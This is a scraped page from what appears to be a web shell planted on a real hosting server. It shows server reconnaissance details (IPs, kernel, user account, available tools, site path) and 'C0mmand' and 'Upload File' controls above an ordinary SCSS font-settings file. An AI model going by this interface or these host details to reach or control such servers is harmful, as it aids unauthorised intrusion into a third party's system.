Server IP : 103.191.208.50 / Your IP : 216.73.216.53 Web Server : LiteSpeed System : Linux orion.herosite.pro 4.18.0-553.53.1.lve.el8.x86_64 #1 SMP Wed May 28 17:01:02 UTC 2025 x86_64 User : celkcksm ( 1031) PHP Version : 7.4.33 Disable Function : show_source, system, shell_exec, passthru, popen, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/celkcksm/hrms.ncriptech.com/resources/sass/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
/* 1) Font Name: Lexend Font URI: https://fonts.google.com/specimen/Lexend 2) Font Name: Inter Font URI: https://fonts.google.com/specimen/Inter 3) Font Name: Lexend Font URI: https://fonts.google.com/specimen/Poppins */ // Importing lexend, inter, and poppins from google fonts @import url("https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&family=Lexend:wght@300;400;500;600;700&family=Poppins:ital,wght@0,300;0,400;0,500;0,600;0,700;1,300;1,400;1,500;1,600;1,700&display=swap"); // Fonts \\ $font-lexend: "Lexend", sans-serif; $font-inter: "Inter", sans-serif; $font-poppins: "Poppins", sans-serif; // Using Font \\ $font-family-primary: $font-lexend; $font-family-secondary: $font-inter; $font-family-body: $font-family-primary;